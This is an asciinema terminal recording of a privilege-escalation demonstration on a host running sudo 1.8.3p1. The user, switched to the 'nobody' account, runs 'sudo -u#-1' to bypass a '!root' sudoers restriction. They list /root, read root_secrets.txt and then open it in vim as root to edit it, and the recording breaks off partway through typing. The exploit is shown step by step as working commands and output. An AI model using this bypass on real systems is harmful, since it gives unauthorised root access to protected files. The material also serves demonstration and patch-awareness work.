{"version": 2, "width": 158, "height": 37, "timestamp": 1614085628, "idle_time_limit": 1.0, "env": {"SHELL": "/bin/bash", "TERM": "screen"}}
[0.020406, "o", "user@oldsudo:~$ "]
[0.94393, "o", "s"]
[1.151977, "o", "u"]
[1.35906, "o", "d"]
[2.065119, "o", "o"]
[2.912263, "o", " "]
[3.95109, "o", "-"]
[4.527216, "o", "l"]
[7.217115, "o", "\r\n"]
[7.229972, "o", "[sudo] password for user: "]
[14.159415, "o", "\r\n"]
[14.166725, "o", "Matching Defaults entries for user on this host:"]
[14.166884, "o", "\r\n"]
[14.167095, "o", "    env_reset, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser user may run the following commands on this host:\r\n"]
[14.167261, "o", "    (ALL : ALL) ALL\r\n"]
[14.16802, "o", "user@oldsudo:~$ "]
[17.392903, "o", "i"]
[17.487434, "o", "d"]
[17.599528, "o", "\r\n"]
[17.601636, "o", "uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)\r\n"]
[17.601824, "o", "user@oldsudo:~$ "]
[34.367769, "o", "s"]
[34.592331, "o", "u"]
[34.865441, "o", "d"]
[35.023736, "o", "o"]
[35.135415, "o", " "]
[35.313433, "o", "v"]
[35.441148, "o", "i"]
[35.583889, "o", "s"]
[35.775481, "o", "u"]
[35.9836, "o", "d"]
[36.159572, "o", "o"]
[36.38398, "o", "\r\n"]
[36.414546, "o", "\u001b(B\u001b)0\u001b[?1049h\u001b[1;37r\u001b[m\u000f\u001b[4l\u001b[39;49m\u001b[?1h\u001b="]
[36.415251, "o", "\u001b[?1h\u001b="]
[36.415612, "o", "\u001b[?1h\u001b="]
[36.41592, "o", "\u001b[?25l"]
[36.416638, "o", "\u001b[39;49m\u001b[m\u000f\u001b[H\u001b[J\u001b[35;72H"]
[36.416996, "o", "\u001b[0;7m\u000f[ Reading File ]"]
[36.417209, "o", "\u001b[m\u000f"]
[36.417523, "o", "\u001b[35;71H"]
[36.417748, "o", "\u001b[0;7m\u000f[ Read 29 lines ]"]
[36.417961, "o", "\u001b[m\u000f"]
[36.418861, "o", "\u001b[H"]
[36.419397, "o", "\u001b[0;7m\u000f  GNU nano 2.9.3                                                          /etc/sudoers.tmp                                                                    \u001b[1;157H"]
[36.420018, "o", "\u001b[m\u000f"]
[36.420516, "o", "\r\u001b[36d"]
[36.420682, "o", "\u001b[0;7m\u000f^G\u001b[m\u000f Get Help\u001b[18G"]
[36.420866, "o", "\u001b[0;7m\u000f^O\u001b[m\u000f Write Out     \u001b[0;7m\u000f^W\u001b[m\u000f Where Is\u001b[52G"]
[36.421016, "o", "\u001b[0;7m\u000f^K\u001b[m\u000f Cut Text\u001b[69G"]
[36.421173, "o", "\u001b[0;7m\u000f^J\u001b[m\u000f Justify\u001b[86G"]
[36.421339, "o", "\u001b[0;7m\u000f^C\u001b[m\u000f Cur Pos\u001b[103G"]
[36.421497, "o", "\u001b[0;7m\u000fM-U\u001b[m\u000f Undo\u001b[36;120H"]
[36.421661, "o", "\u001b[0;7m\u000fM-A\u001b[m\u000f Mark Text    \u001b[0;7m\u000fM-]\u001b[m\u000f To Bracket\r\u001b[37d"]
[36.421829, "o", "\u001b[0;7m\u000f^X\u001b[m\u000f Exit\u001b[37;18H"]
[36.421991, "o", "\u001b[0;7m\u000f^R\u001b[m\u000f Read File     \u001b[0;7m\u000f^\\\u001b[m\u000f Replace\u001b[52G"]
[36.42215, "o", "\u001b[0;7m\u000f^U\u001b[m\u000f Uncut Text    \u001b[0;7m\u000f^T\u001b[m\u000f To Spell\u001b[86G"]
[36.4223, "o", "\u001b[0;7m\u000f^_\u001b[m\u000f Go To Line    \u001b[0;7m\u000fM-E\u001b[m\u000f Redo\u001b[37;120H"]
[36.422459, "o", "\u001b[0;7m\u000fM-6\u001b[m\u000f Copy Text    \u001b[0;7m\u000fM-W\u001b[m\u000f WhereIs Next\r\u001bM\u001bM"]
[36.423168, "o", "\u001b[3d"]
[36.423323, "o", "\u001b[39;49m\u001b[36m#\u001b[4d\b"]
[36.423479, "o", "# This file MUST be edited with the 'visudo' command as root.\r\u001b[5d"]
[36.423647, "o", "#\u001b[6d\b"]
[36.423801, "o", "# Please consider adding local content in /etc/sudoers.d/ instead of\r\u001b[7d"]
[36.423951, "o", "# directly modifying this file.\r\u001b[8d"]
[36.42411, "o", "#\u001b[9d\b"]
[36.424257, "o", "# See the man page for details on how to write a sudoers file.\r\u001b[10d"]
[36.424402, "o", "#\u001b[11d\b"]
[36.424541, "o", "\u001b[39m\u001b[m\u000fDefaults\u001b[11;17H"]
[36.424688, "o", "env_reset\r\u001b[12d"]
[36.424835, "o", "Defaults\u001b[12;17H"]
[36.424984, "o", "secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"\r\u001b[14d"]
[36.425144, "o", "\u001b[36m# Host alias specification\r\u001b[16d"]
[36.425317, "o", "# User alias specification\r\u001b[18d"]
[36.425481, "o", "# Cmnd alias specification\r\u001b[20d"]
[36.425626, "o", "# User privilege specification\r\u001b[21d"]
[36.425772, "o", "\u001b[39m\u001b[m\u000froot    ALL=(ALL:ALL) ALL\r\u001b[23d"]
[36.425935, "o", "\u001b[36m# Members of the admin group may gain root privileges\r\u001b[24d"]
[36.42609, "o", "\u001b[39m\u001b[m\u000f%admin ALL=(ALL) ALL\r\u001b[26d"]
[36.426238, "o", "\u001b[36m# Allow members of group sudo to execute any command\r\u001b[27d"]
[36.426383, "o", "\u001b[39m\u001b[m\u000f%sudo   ALL=(ALL:ALL) ALL\r\u001b[28d"]
[36.426531, "o", "nobody  ALL=(ALL, !root) ALL\r\u001b[29d"]
[36.426703, "o", "\u001b[36m# See sudoers(5) for more information on \"#include\" directives:\r\u001b[31d"]
[36.426863, "o", "#includedir /etc/sudoers.d\r\u001b[3d"]
[36.427003, "o", "\u001b[39m\u001b[m\u000f"]
[36.427154, "o", "\u001b[34h\u001b[?25h"]
[38.015805, "o", "\u001b[?25l"]
[38.01613, "o", "\u001b[4d\u001b[34h\u001b[?25h"]
[38.516687, "o", "\u001b[?25l"]
[38.517633, "o", "\u001b[5d"]
[38.518234, "o", "\u001b[34h\u001b[?25h"]
[38.54555, "o", "\u001b[?25l"]
[38.5457, "o", "\u001b[6d"]
[38.545779, "o", "\u001b[34h\u001b[?25h"]
[38.575655, "o", "\u001b[?25l"]
[38.575849, "o", "\u001b[7d"]
[38.575935, "o", "\u001b[34h\u001b[?25h"]
[38.607432, "o", "\u001b[?25l"]
[38.608117, "o", "\u001b[8d"]
[38.608362, "o", "\u001b[34h\u001b[?25h"]
[38.637813, "o", "\u001b[?25l"]
[38.638453, "o", "\u001b[9d\u001b[34h\u001b[?25h"]
[38.667361, "o", "\u001b[?25l"]
[38.667543, "o", "\u001b[10d\u001b[34h\u001b[?25h"]
[38.696905, "o", "\u001b[?25l"]
[38.697151, "o", "\u001b[11d"]
[38.697285, "o", "\u001b[34h\u001b[?25h"]
[38.726787, "o", "\u001b[?25l"]
[38.72695, "o", "\u001b[12d\u001b[34h\u001b[?25h"]
[38.757203, "o", "\u001b[?25l"]
[38.757341, "o", "\u001b[13d"]
[38.757399, "o", "\u001b[34h\u001b[?25h"]
[38.785939, "o", "\u001b[?25l"]
[38.786104, "o", "\u001b[14d\u001b[34h\u001b[?25h"]
[38.816679, "o", "\u001b[?25l"]
[38.816954, "o", "\u001b[15d\u001b[34h\u001b[?25h"]
[38.848604, "o", "\u001b[?25l"]
[38.849614, "o", "\u001b[16d\u001b[34h\u001b[?25h"]
[38.878206, "o", "\u001b[?25l"]
[38.878453, "o", "\u001b[17d"]
[38.878576, "o", "\u001b[34h\u001b[?25h"]
[38.908273, "o", "\u001b[?25l"]
[38.90854, "o", "\u001b[18d\u001b[34h\u001b[?25h"]
[38.937499, "o", "\u001b[?25l"]
[38.937705, "o", "\u001b[19d\u001b[34h\u001b[?25h"]
[38.967952, "o", "\u001b[?25l"]
[38.968108, "o", "\u001b[20d"]
[38.968203, "o", "\u001b[34h\u001b[?25h"]
[38.996959, "o", "\u001b[?25l"]
[38.997114, "o", "\u001b[21d"]
[38.997196, "o", "\u001b[34h\u001b[?25h"]
[39.028357, "o", "\u001b[?25l"]
[39.028653, "o", "\u001b[22d\u001b[34h\u001b[?25h"]
[39.059951, "o", "\u001b[?25l"]
[39.060458, "o", "\u001b[23d"]
[39.060946, "o", "\u001b[34h\u001b[?25h"]
[39.088846, "o", "\u001b[?25l"]
[39.089115, "o", "\u001b[24d\u001b[34h\u001b[?25h"]
[39.119067, "o", "\u001b[?25l"]
[39.119344, "o", "\u001b[25d\u001b[34h\u001b[?25h"]
[39.424319, "o", "\u001b[?25l\u001b[26d"]
[39.424989, "o", "\u001b[34h\u001b[?25h"]
[39.616008, "o", "\u001b[?25l\u001b[27d\u001b[34h\u001b[?25h"]
[39.761382, "o", "\u001b[?25l\u001b[28d\u001b[34h\u001b[?25h"]
[39.905012, "o", "\u001b[?25l\u001b[35d\u001b[K\u001b[29d\u001b[34h\u001b[?25h"]
[42.531116, "o", "\u001b[?25l\u001b[36d\u001b[J\u001b[37;158H\u001b[34h\u001b[?25h\u001b[37;1H\u001b[?1049l\r\u001b[?1l\u001b>"]
[42.531904, "o", "visudo: "]
[42.532277, "o", "/etc/sudoers.tmp unchanged\r\n"]
[42.536549, "o", "user@oldsudo:~$ "]
[46.353209, "o", "s"]
[46.591791, "o", "u"]
[46.945369, "o", "d"]
[47.135687, "o", "o"]
[47.29737, "o", " "]
[47.521174, "o", "."]
[47.921054, "o", "\b\u001b[K"]
[48.081606, "o", "-"]
[48.481424, "o", "u"]
[50.001213, "o", " "]
[50.720392, "o", "n"]
[50.959637, "o", "o"]
[51.169632, "o", "b"]
[51.31328, "o", "o"]
[51.617436, "o", "d"]
[52.177188, "o", "y"]
[52.336453, "o", " "]
[52.592247, "o", "/"]
[53.583756, "o", "b"]
[53.777412, "o", "i"]
[54.032341, "o", "n"]
[54.6093, "o", "/"]
[55.008514, "o", "b"]
[55.2001, "o", "a"]
[55.327843, "o", "s"]
[55.48965, "o", "h"]
[56.642385, "o", "\r\n"]
[56.702221, "o", "nobody@oldsudo:~$ "]
[58.512013, "o", "i"]
[58.689829, "o", "d"]
[58.927898, "o", "\r\n"]
[58.929536, "o", "uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)\r\n"]
[58.929749, "o", "nobody@oldsudo:~$ "]
[61.200361, "o", "s"]
[61.328389, "o", "u"]
[61.537718, "o", "d"]
[61.664039, "o", "o"]
[61.825668, "o", " "]
[62.287943, "o", "-"]
[62.832111, "o", "l"]
[63.873712, "o", "\r\n"]
[63.885175, "o", "[sudo] password for nobody: "]
[67.681271, "o", "\r\n"]
[67.714317, "o", "Matching Defaults entries for nobody on this host:"]
[67.715157, "o", "\r\n"]
[67.715928, "o", "    env_reset, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\r\n\r\nUser nobody may run the following commands on this host:\r\n    (ALL, !root) ALL\r\n"]
[67.716972, "o", "nobody@oldsudo:~$ "]
[71.714283, "o", "s"]
[72.000155, "o", "u"]
[72.513851, "o", "d"]
[72.674345, "o", "o"]
[72.849828, "o", " "]
[74.000366, "o", "-"]
[74.466086, "o", "V"]
[76.209599, "o", "\r\n"]
[76.214296, "o", "Sudo version 1.8.3p1\r\n"]
[76.21647, "o", "Sudoers policy plugin version 1.8.3p1\r\nSudoers file grammar version 40\r\nSudoers I/O plugin version 1.8.3p1\r\n"]
[76.217078, "o", "nobody@oldsudo:~$ "]
[82.76884, "o", "s"]
[83.328717, "o", "u"]
[83.74623, "o", "d"]
[84.608367, "o", "o"]
[84.784269, "o", " "]
[85.26434, "o", "-"]
[85.936331, "o", "u"]
[87.201017, "o", "#"]
[87.858936, "o", "-"]
[89.154757, "o", "1"]
[89.410425, "o", " "]
[90.464327, "o", "l"]
[90.770606, "o", "s"]
[91.008307, "o", " "]
[91.521883, "o", "/"]
[92.17619, "o", "r"]
[92.384289, "o", "o"]
[92.528405, "o", "o"]
[92.704334, "o", "t"]
[95.617838, "o", "\r\n"]
[95.635599, "o", "root_secrets.txt\r\n"]
[95.639683, "o", "nobody@oldsudo:~$ "]
[98.336087, "o", "sudo -u#-1 ls /root"]
[100.272651, "o", "/"]
[101.778116, "o", "r"]
[101.921151, "o", "o"]
[102.066703, "o", "o"]
[102.193905, "o", "t"]
[102.674628, "o", "_"]
[103.056586, "o", "s"]
[103.153016, "o", "e"]
[103.47257, "o", "c"]
[103.696815, "o", "r"]
[103.792691, "o", "e"]
[104.065922, "o", "t"]
[104.384518, "o", "s"]
[104.706444, "o", "."]
[104.94437, "o", "t"]
[105.234066, "o", "x"]
[105.49052, "o", "t"]
[105.840239, "o", "\b"]
[106.340218, "o", "\b"]
[106.370907, "o", "\b"]
[106.400418, "o", "\b"]
[106.431149, "o", "\b"]
[106.460402, "o", "\b"]
[106.490902, "o", "\b"]
[106.521277, "o", "\b"]
[106.553543, "o", "\b"]
[106.581984, "o", "\b"]
[106.612817, "o", "\b"]
[106.643702, "o", "\b"]
[106.673723, "o", "\b"]
[106.70262, "o", "\b"]
[106.733606, "o", "\b"]
[106.763229, "o", "\b"]
[106.793226, "o", "\b"]
[106.823122, "o", "\b"]
[106.853488, "o", "\b"]
[106.883257, "o", "\b"]
[107.136601, "o", "\b"]
[107.298348, "o", "\b"]
[107.440669, "o", "\b"]
[108.146552, "o", "\b\u001b[1P /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[108.336373, "o", "\b\u001b[1P /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[108.528825, "o", "c /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[108.608688, "o", "a /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[108.800895, "o", "t /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[109.425959, "o", "\r\n"]
[109.443954, "o", "asdf\tthere is a bug in sudo, I hope nobody exploits it before i can patch it.\r\n"]
[109.447862, "o", "nobody@oldsudo:~$ "]
[114.049476, "o", "sudo -u#-1 cat /root/root_secrets.txt"]
[116.064859, "o", "\b"]
[116.564189, "o", "\b"]
[116.595447, "o", "\b"]
[116.625842, "o", "\b"]
[116.656752, "o", "\b"]
[116.685565, "o", "\b"]
[116.717407, "o", "\b"]
[116.747069, "o", "\b"]
[116.776211, "o", "\b"]
[116.806283, "o", "\b"]
[116.836601, "o", "\b"]
[116.866332, "o", "\b"]
[116.896516, "o", "\b"]
[116.927264, "o", "\b"]
[116.957233, "o", "\b"]
[116.986447, "o", "\b"]
[117.017013, "o", "\b"]
[117.047508, "o", "\b"]
[117.077778, "o", "\b"]
[117.312693, "o", "\b"]
[117.472791, "o", "\b"]
[117.616369, "o", "\b"]
[117.745175, "o", "\b"]
[118.385054, "o", "\b\u001b[1P /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[118.816777, "o", "\b\u001b[1P /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[119.040977, "o", "\b\u001b[1P /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[120.594745, "o", "v /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[120.736874, "o", "i /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[120.977215, "o", "m /root/root_secrets.txt\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b"]
[121.938436, "o", "\r\n"]
[121.994148, "o", "\u001b[?1049h\u001b[?1h\u001b="]
[121.99502, "o", "\u001b[1;37r\u001b[23m\u001b[24m\u001b[0m\u001b[H\u001b[J\u001b[?25l\u001b[37;1H\"/root/root_secrets.txt\""]
[121.995185, "o", " [readonly] 1L, 78C"]
[121.998477, "o", "\u001b[1;1Hasdf    there is a bug in sudo, I hope nobody exploits it before i can patch it.\r\n\u001b[1m\u001b[34m~                                                                                                                                                             \u001b[3;1H~                                                                                                                                                             \u001b[4;1H~                                                                                                                                                             \u001b[5;1H~                                                                                                                                                             \u001b[6;1H~                                                                                                                                                             \u001b[7;1H~                                                                                                          "]
[121.998537, "o", "                                                   \u001b[8;1H~                                                                                                                                                             \u001b[9;1H~                                                                                                                                                             \u001b[10;1H~                                                                                                                                                             \u001b[11;1H~                                                                                                                                                             \u001b[12;1H~                                                                                                                                                             \u001b[13;1H~                                                                                                                                             "]
[121.998741, "o", "                \u001b[14;1H~                                                                                                                                                             \u001b[15;1H~                                                                                                                                                             \u001b[16;1H~                                                                                                                                                             \u001b[17;1H~                                                                                                                                                             \u001b[18;1H~                                                                                                                                                             \u001b[19;1H~                                                                                                                                                             \u001b[20;1H~          "]
[121.998774, "o", "                                                                                                                                                   \u001b[21;1H~                                                                                                                                                             \u001b[22;1H~                                                                                                                                                             \u001b[23;1H~                                                                                                                                                             \u001b[24;1H~                                                                                                                                                             \u001b[25;1H~                                                                                                                                                             \u001b[26;1H~                                           "]
[121.998948, "o", "                                                                                                                  \u001b[27;1H~                                                                                                                                                             \u001b[28;1H~                                                                                                                                                             \u001b[29;1H~                                                                                                                                                             \u001b[30;1H~                                                                                                                                                             \u001b[31;1H~                                                                                                                                                             \u001b[32;1H~                                                                             "]
[121.998972, "o", "                                                                                \u001b[33;1H~                                                                                                                                                             \u001b[34;1H~                                                                                                                                                             \u001b[35;1H~                                                                                                                                                             \u001b[36;1H~                                                                                                                                                             \u001b[0m\u001b[37;141H1,1\u001b[11CAll\u001b[1;1H\u001b[34h\u001b[?25h"]
[123.681847, "o", "\u001b[?25l\u001b[37;131Hd\u001b[1;1H"]
[123.682758, "o", "\u001b[34h\u001b[?25h"]
[123.761241, "o", "\u001b[?25l\u001b[37;132Hw\u001b[1;1H"]
[123.761817, "o", "\u001b[37;1H\u001b[31mW10: Warning: Changing a readonly file\u001b[0m\u001b[37;39H\u001b[K"]
[124.762891, "o", "\u001b[1;1Hthere is a bug in sudo, I hope nobody exploits it before i can patch it.\u001b[1;73H\u001b[K\u001b[1;1H\u001b[34h\u001b[?25h"]
[126.994127, "o", "\u001b[?25l\u001b[37;131H^M\u001b[1;1H"]
[126.995095, "o", "\u0007\u001b[37;131H  \u001b[1;1H\u001b[34h\u001b[?25h"]
[127.680712, "o", "\u001b[?25l\u001b[37;131Hd\u001b[1;1H"]
[127.680984, "o", "\u001b[34h\u001b[?25h"]
[129.216465, "o", "\u001b[?25l\u001b[37;132Hw\u001b[1;1H"]
[129.217044, "o", "\u001b[37;131H  \u001b[1;1His a bug in sudo, I hope nobody exploits it before i can patch it.\u001b[1;67H\u001b[K\u001b[1;1H\u001b[34h\u001b[?25h"]
[132.305454, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;1H"]
[132.306195, "o", "\u001b[37;131H   \u001b[1;2H\u001b[37;141H1,2\u001b[11CAll\u001b[1;2H\u001b[34h\u001b[?25h"]
[132.804246, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;2H"]
[132.804621, "o", "\u001b[37;131H   \u001b[1;3H\u001b[37;143H3\u001b[1;3H\u001b[34h\u001b[?25h"]
[132.835494, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;3H"]
[132.836767, "o", "\u001b[37;131H   \u001b[1;4H\u001b[37;143H4\u001b[1;4H\u001b[34h\u001b[?25h"]
[132.864237, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;4H"]
[132.864592, "o", "\u001b[37;131H   \u001b[1;5H\u001b[37;143H5\u001b[1;5H\u001b[34h\u001b[?25h"]
[132.895069, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;5H"]
[132.895459, "o", "\u001b[37;131H   \u001b[1;6H\u001b[37;143H6\u001b[1;6H\u001b[34h\u001b[?25h"]
[132.926221, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;6H"]
[132.926588, "o", "\u001b[37;131H   \u001b[1;7H\u001b[37;143H7\u001b[1;7H\u001b[34h\u001b[?25h"]
[132.9559, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;7H"]
[132.956496, "o", "\u001b[37;131H   \u001b[1;8H\u001b[37;143H8\u001b[1;8H\u001b[34h\u001b[?25h"]
[132.986495, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;8H"]
[132.98709, "o", "\u001b[37;131H   \u001b[1;9H\u001b[37;143H9\u001b[1;9H\u001b[34h\u001b[?25h"]
[133.017022, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;9H"]
[133.017423, "o", "\u001b[37;131H   \u001b[1;10H\u001b[37;143H10\u001b[1;10H\u001b[34h\u001b[?25h"]
[133.047777, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;10H"]
[133.048371, "o", "\u001b[37;131H   \u001b[1;11H\u001b[37;144H1\u001b[1;11H\u001b[34h\u001b[?25h"]
[133.077461, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;11H"]
[133.077796, "o", "\u001b[37;131H   \u001b[1;12H\u001b[37;144H2\u001b[1;12H\u001b[34h\u001b[?25h"]
[133.107482, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;12H"]
[133.107804, "o", "\u001b[37;131H   \u001b[1;13H\u001b[37;144H3\u001b[1;13H\u001b[34h\u001b[?25h"]
[133.137359, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;13H"]
[133.137729, "o", "\u001b[37;131H   \u001b[1;14H\u001b[37;144H4\u001b[1;14H\u001b[34h\u001b[?25h"]
[133.167571, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;14H"]
[133.168162, "o", "\u001b[37;131H   \u001b[1;15H\u001b[37;144H5\u001b[1;15H\u001b[34h\u001b[?25h"]
[133.199363, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;15H"]
[133.201439, "o", "\u001b[37;131H   \u001b[1;16H\u001b[37;144H6\u001b[1;16H\u001b[34h\u001b[?25h"]
[133.227823, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;16H"]
[133.228133, "o", "\u001b[37;131H   \u001b[1;17H\u001b[37;144H7\u001b[1;17H\u001b[34h\u001b[?25h"]
[133.258473, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;17H"]
[133.259186, "o", "\u001b[37;131H   \u001b[1;18H\u001b[37;144H8\u001b[1;18H\u001b[34h\u001b[?25h"]
[133.288134, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;18H"]
[133.288439, "o", "\u001b[37;131H   \u001b[1;19H\u001b[37;144H9\u001b[1;19H\u001b[34h\u001b[?25h"]
[133.318342, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;19H"]
[133.318633, "o", "\u001b[37;131H   \u001b[1;20H\u001b[37;143H20\u001b[1;20H\u001b[34h\u001b[?25h"]
[133.348079, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;20H"]
[133.348377, "o", "\u001b[37;131H   \u001b[1;21H\u001b[37;144H1\u001b[1;21H\u001b[34h\u001b[?25h"]
[133.378233, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;21H"]
[133.378599, "o", "\u001b[37;131H   \u001b[1;22H\u001b[37;144H2\u001b[1;22H\u001b[34h\u001b[?25h"]
[133.409384, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;22H"]
[133.409832, "o", "\u001b[37;131H   \u001b[1;23H\u001b[37;144H3\u001b[1;23H\u001b[34h\u001b[?25h"]
[133.439824, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;23H"]
[133.440163, "o", "\u001b[37;131H   \u001b[1;24H\u001b[37;144H4\u001b[1;24H\u001b[34h\u001b[?25h"]
[133.469338, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;24H"]
[133.469637, "o", "\u001b[37;131H   \u001b[1;25H\u001b[37;144H5\u001b[1;25H\u001b[34h\u001b[?25h"]
[133.499414, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;25H"]
[133.499766, "o", "\u001b[37;131H   \u001b[1;26H\u001b[37;144H6\u001b[1;26H\u001b[34h\u001b[?25h"]
[133.530453, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;26H"]
[133.530877, "o", "\u001b[37;131H   \u001b[1;27H\u001b[37;144H7\u001b[1;27H\u001b[34h\u001b[?25h"]
[133.559917, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;27H"]
[133.560516, "o", "\u001b[37;131H   \u001b[1;28H\u001b[37;144H8\u001b[1;28H\u001b[34h\u001b[?25h"]
[133.590867, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;28H"]
[133.592268, "o", "\u001b[37;131H   \u001b[1;29H\u001b[37;144H9\u001b[1;29H\u001b[34h\u001b[?25h"]
[133.61967, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;29H"]
[133.620531, "o", "\u001b[37;131H   \u001b[1;30H\u001b[37;143H30\u001b[1;30H\u001b[34h\u001b[?25h"]
[133.649728, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;30H"]
[133.650411, "o", "\u001b[37;131H   \u001b[1;31H\u001b[37;144H1\u001b[1;31H\u001b[34h\u001b[?25h"]
[133.679843, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;31H"]
[133.680274, "o", "\u001b[37;131H   \u001b[1;32H\u001b[37;144H2\u001b[1;32H\u001b[34h\u001b[?25h"]
[133.711253, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;32H"]
[133.711922, "o", "\u001b[37;131H   \u001b[1;33H\u001b[37;144H3\u001b[1;33H\u001b[34h\u001b[?25h"]
[133.740248, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;33H"]
[133.740562, "o", "\u001b[37;131H   \u001b[1;34H\u001b[37;144H4\u001b[1;34H\u001b[34h\u001b[?25h"]
[133.771042, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;34H"]
[133.771418, "o", "\u001b[37;131H   \u001b[1;35H\u001b[37;144H5\u001b[1;35H\u001b[34h\u001b[?25h"]
[133.80143, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;35H"]
[133.801904, "o", "\u001b[37;131H   \u001b[1;36H\u001b[37;144H6\u001b[1;36H\u001b[34h\u001b[?25h"]
[133.831229, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;36H"]
[133.83158, "o", "\u001b[37;131H   \u001b[1;37H\u001b[37;144H7\u001b[1;37H\u001b[34h\u001b[?25h"]
[133.861275, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;37H"]
[133.861704, "o", "\u001b[37;131H   \u001b[1;38H\u001b[37;144H8\u001b[1;38H\u001b[34h\u001b[?25h"]
[133.891434, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;38H"]
[133.891829, "o", "\u001b[37;131H   \u001b[1;39H\u001b[37;144H9\u001b[1;39H\u001b[34h\u001b[?25h"]
[133.921415, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;39H"]
[133.921913, "o", "\u001b[37;131H   \u001b[1;40H\u001b[37;143H40\u001b[1;40H\u001b[34h\u001b[?25h"]
[133.951282, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;40H"]
[133.951767, "o", "\u001b[37;131H   \u001b[1;41H\u001b[37;144H1\u001b[1;41H\u001b[34h\u001b[?25h"]
[133.981775, "o", "\u001b[?25l\u001b[37;131H~@k\u001b[1;41H"]
[133.982117, "o", "\u001b[37;131H   \u001b[1;42H\u001b[37;144H2\u001b[1;42H\u001b[34h\u001b[?25h"]
[136.738811, "o", "\u001b[?25l\u001b[37;131H~@@\u001b[1;42H"]
[136.740718, "o", "\u001b[37;131H   \u001b[1;66H\u001b[37;143H66\u001b[1;66H\u001b[34h\u001b[?25h"]
[138.096608, "o", "\u001b[?25l\u001b[37;131Hi\u001b[1;66H"]
[138.096868, "o", "\u001b[37;131H \u001b[1;66H"]
[138.097032, "o", "\u001b[37;1H\u001b[1m-- INSERT --\u001b[0m\u001b[37;13H\u001b[K\u001b[37;141H1,66\u001b[10CAll"]
[138.097158, "o", "\u001b[1;66H\u001b[34h\u001b[?25h"]
[138.73919, "o", "\u001b[?25l\u001b[37;144H7\u001b[1;67H\u001b[34h\u001b[?25h"]
[139.795487, "o", "\u001b[?25l\u001b[2;1H\u001b[K\u001b[37;141H2,1 \u001b[2;1H\u001b[34h\u001b[?25h"]
[140.291775, "o", "\u001b[?25l\u001b[3;1H\u001b[K\u001b[37;141H3\u001b[3;1H\u001b[34h\u001b[?25h"]
[141.008681, "o", "\u001b[?25lW\u001b[37;143H2\u001b[3;2H\u001b[34h\u001b[?25h"]
[142.289129, "o", "\u001b[?25le\u001b[37;143H3\u001b[3;3H\u001b[34h\u001b[?25h"]
[142.416887, "o", "\u001b[?25l\u001b[37;143H4\u001b[3;4H\u001b[34h\u001b[?25h"]
[142.609018, "o", "\u001b[?25la\u001b[37;143H5\u001b[3;5H\u001b[34h\u001b[?25h"]
[142.784574, "o", "\u001b[?25lr\u001b[37;143H6\u001b[3;6H\u001b[34h\u001b[?25h"]
